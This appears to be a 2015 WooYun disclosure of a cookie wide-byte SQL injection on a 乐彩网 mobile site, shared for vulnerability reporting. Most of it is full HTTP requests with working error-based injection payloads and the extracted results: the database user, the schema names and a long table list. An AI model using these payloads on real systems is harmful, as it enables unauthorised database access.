当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110248

漏洞标题:乐彩网某站Cookie宽字节注入

相关厂商:乐彩网

漏洞作者: 深度安全实验室

提交时间:2015-04-26 13:30

修复时间:2015-05-08 17:01

公开时间:2015-05-08 17:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-26: 细节已通知厂商并且等待厂商处理中
2015-04-27: 厂商已经确认,细节仅向厂商公开
2015-05-07: 细节向核心白帽子及相关领域专家公开
2015-05-08: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

wap.17500.cn

宽字节注入:

GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,user(),0x5e5e5e) from information_schema.tables limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive

cookie中的KmGZ_89fa_sid参数

1.jpg


user: bbs@192.168.100.107


接下来看看库:

GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,schema_name,0x5e5e5e) from information_schema.SCHEMATA limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive

2.jpg

三个库:

information_schema
bbs
test


获取bbs库中的表:

GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,table_name,0x5e5e5e) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive

3.jpg


378张表,只能叫burp帮忙跑跑:

4.jpg

baidusubmit_sitemap
baidusubmit_urlstat
collect_banlog
collect_cplog
collect_errorlog
collect_illegallog
collect_logpos
collect_modcplog
collect_modslog
collect_ratelog
common_addon
common_admincp_cmenu
common_admincp_group
common_admincp_member
common_admincp_perm
common_admincp_session
common_admingroup
common_adminnote
common_advertisement
common_advertisement_custom
common_banned
common_block
common_block_favorite
common_block_item
common_block_item_data
common_block_permission
common_block_pic
common_block_style
common_block_xml
common_cache
common_card
common_card_log
common_card_type
common_connect_guest
common_credit_log
common_credit_log_field
common_credit_rule
common_credit_rule_log
common_credit_rule_log_field
common_cron
common_devicetoken
common_district
common_diy_data
common_domain
common_failedip
common_failedlogin
common_friendlink
common_grouppm
common_invite
common_limit_ips
common_limit_login
common_limit_time
common_magic
common_magiclog
common_mailcron
common_mailqueue
common_member
common_member_action_log
common_member_connect
common_member_count
common_member_crime
common_member_field_forum
common_member_field_home
common_member_forum_buylog
common_member_grouppm
common_member_log
common_member_magic
common_member_medal
common_member_newprompt
common_member_profile
common_member_profile
common_member_profile_setting
common_member_security
common_member_secwhite
common_member_stat_field
common_member_stat_fieldcache
common_member_stat_search
common_member_stat_searchcache
common_member_status
common_member_temp___
common_member_validate
common_member_verify
common_member_verify_info
common_moderate
common_myapp
common_myinvite
common_mytask
common_nav
common_onlinetime
common_optimizer
common_patch
common_plugin
common_pluginvar
common_process
common_regip
common_relatedlink
common_remote_port
common_report
common_searchindex
common_seccheck
common_secquestion
common_session
common_setting
common_smiley
common_sms_validate
common_sms_validate_log
common_sphinxcounter
common_stat
common_statuser
common_style
common_stylevar
common_syscache
common_syscache_bak
common_tag
common_tagitem
common_task
common_taskvar
common_template
common_template_block
common_template_permission
common_uin_black
common_usergroup
common_usergroup_field
common_visit
common_word
common_word_type
connect_disktask
connect_feedlog
connect_memberbindlog
connect_postfeedlog
connect_tlog
connect_tthreadlog
forum_access
forum_activity
forum_activityapply
forum_announcement
forum_attachment
forum_attachment_0
forum_attachment_1
forum_attachment_2
forum_attachment_3
forum_attachment_4
forum_attachment_5
forum_attachment_6
forum_attachment_7
forum_attachment_8
forum_attachment_9
forum_attachment_exif
forum_attachment_unused
forum_attachtype
forum_bbcode
forum_collection
forum_collectioncomment
forum_collectionfollow
forum_collectioninvite
forum_collectionrelated
forum_collectionteamworker
forum_collectionthread
forum_creditslog
forum_debate
forum_debatepost
forum_faq
forum_filter_post
forum_forum
forum_forum_threadtable
forum_forumfield
forum_forumrecommend
forum_groupcreditslog
forum_groupfield
forum_groupinvite
forum_grouplevel
forum_groupranking
forum_groupuser
forum_hotreply_member
forum_hotreply_number
forum_imagetype
forum_medal
forum_medallog
forum_memberrecommend
forum_moderator
forum_modwork
forum_newthread
forum_onlinelist
forum_order
forum_poll
forum_polloption
forum_polloption_image
forum_pollvoter
forum_post
forum_post_1
forum_post_2
forum_post_3
forum_post_4
forum_post_5
forum_post_6
forum_post_7
forum_post_8
forum_post_9
forum_post_location
forum_post_moderate
forum_post_tableid
forum_postcache
forum_postcomment
forum_postlog
forum_postposition
forum_poststick
forum_promotion
forum_ratelog
forum_relatedthread
forum_replycredit
forum_rsscache
forum_sofa
forum_spacecache
forum_statlog
forum_thread
forum_thread_1
forum_thread_moderate
forum_threadaddviews
forum_threadcalendar
forum_threadclass
forum_threadclosed
forum_threaddisablepos
forum_threadhidelog
forum_threadhot
forum_threadimage
forum_threadlog
forum_threadmod
forum_threadpartake
forum_threadpreview
forum_threadprofile
forum_threadprofile_group
forum_threadrush
forum_threadtype
forum_trade
forum_tradecomment
forum_tradelog
forum_typeoption
forum_typeoptionvar
forum_typevar
forum_warning
home_album
home_album_category
home_appcreditlog
home_blacklist
home_blog
home_blog_category
home_blog_moderate
home_blogfield
home_class
home_click
home_clickuser
home_comment
home_comment_moderate
home_docomment
home_doing
home_doing_moderate
home_favorite
home_feed
home_feed_app
home_follow
home_follow_feed
home_follow_feed_archiver
home_friend
home_friend_request
home_friendlog
home_notification
home_pic
home_pic_moderate
home_picfield
home_poke
home_pokearchive
home_share
home_share_moderate
home_show
home_specialuser
home_userapp
home_userappfield
home_visitor
lecai_gifts_activity
lecai_gifts_log
lecai_taihu_article
lecai_taihu_comment
lecai_taihu_formulas
lecai_taihu_guess
lecai_taihu_kind
login_check
mobile_setting
mobileoem_member
mobileoem_pushthreads
myrepeats
plugin_user_defender
plugin_user_defender_badpwd
plugin_user_defender_failedlogin
plugin_user_defender_list
plugin_user_defender_notice
plugin_user_defender_stat
portal_article_content
portal_article_count
portal_article_moderate
portal_article_related
portal_article_title
portal_article_trash
portal_attachment
portal_category
portal_category_permission
portal_comment
portal_comment_moderate
portal_rsscache
portal_topic
portal_topic_pic
pre_home_follow_feed_archiver
security_evilpost
security_eviluser
security_failedlog
uc_admins
uc_applications
uc_avatar_validate
uc_badwords
uc_domains
uc_failedlogins
uc_feeds
uc_friends
uc_mailqueue
uc_memberfields
uc_members
uc_mergemembers
uc_newpm
uc_notelist
uc_pm_indexes
uc_pm_lists
uc_pm_members
uc_pm_messages_0
uc_pm_messages_1
uc_pm_messages_2
uc_pm_messages_3
uc_pm_messages_4
uc_pm_messages_5
uc_pm_messages_6
uc_pm_messages_7
uc_pm_messages_8
uc_pm_messages_9
uc_pms
uc_protectedmembers
uc_settings
uc_sqlcache
uc_tags
uc_vars
ucenter_admins
ucenter_applications
ucenter_badwords
ucenter_domains
ucenter_failedlogins
ucenter_feeds
ucenter_friends
ucenter_mailqueue
ucenter_memberfields
ucenter_members
ucenter_mergemembers
ucenter_newpm
ucenter_notelist
ucenter_pm_indexes
ucenter_pm_lists
ucenter_pm_members
ucenter_pm_messages_0
ucenter_pm_messages_1
ucenter_pm_messages_2
ucenter_pm_messages_3
ucenter_pm_messages_4
ucenter_pm_messages_5
ucenter_pm_messages_6
ucenter_pm_messages_7
ucenter_pm_messages_8
ucenter_pm_messages_9
ucenter_protectedmembers
ucenter_settings
ucenter_sqlcache
ucenter_tags
ucenter_vars


因为开启了gpc,只能把所有的字段提取出来再和表进行猜测匹配,这个有点麻烦,就不弄了。。。

漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-27 10:27

厂商回复:

感谢提供的漏洞信息,我们尽快处理。

最新状态:

2015-05-08:已经及时处理


漏洞评价:

评论

  1. 2015-04-27 00:11 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    关注。

  2. 2015-07-26 16:04 | Eric_zZ ( 路人 | Rank:8 漏洞数:5 | Just try it!)

    请教楼主是如何判断出cookie里的参数可以宽字节注入的呢?